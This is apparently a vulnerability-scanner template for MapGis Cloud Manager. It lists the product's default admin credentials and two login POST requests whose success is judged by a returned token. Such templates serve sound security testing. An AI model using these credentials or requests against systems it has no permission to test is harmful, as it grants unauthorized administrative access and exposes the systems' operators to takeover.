漏洞描述
deafult info: admin / sa admin / sa.mapgis zondy / sa.mapgis
id: mapgis-cloud-manager-default-password
info:
name: MapGis Cloud Manager Default Password
author: zan8in
severity: high
verified: true
description: |
deafult info: admin / sa admin / sa.mapgis zondy / sa.mapgis
tags: mapgis,cloud,manager,default-password
rules:
r0:
request:
method: POST
path: /manager/user/login
body: username=admin&password=MZYZFc8xsG3D4BsrNFyA1rycKm7C7PUwzxItAbdFu7gJ%3DE%3DN&code=
expression: response.status == 200 && response.body.bcontains(b'"msg":') && response.body.bcontains(b'"code":') && response.body.bcontains(b'"token":')
r1:
request:
method: POST
path: /manager/user/login
body: username=admin&password=m7RGgJbDfayRHRxFEyqNXAPYwhN3afhiysBkfPsyMtQt=D=C
expression: response.status == 200 && response.body.bcontains(b'"msg":') && response.body.bcontains(b'"code":') && response.body.bcontains(b'"token":')
expression: r0() || r1()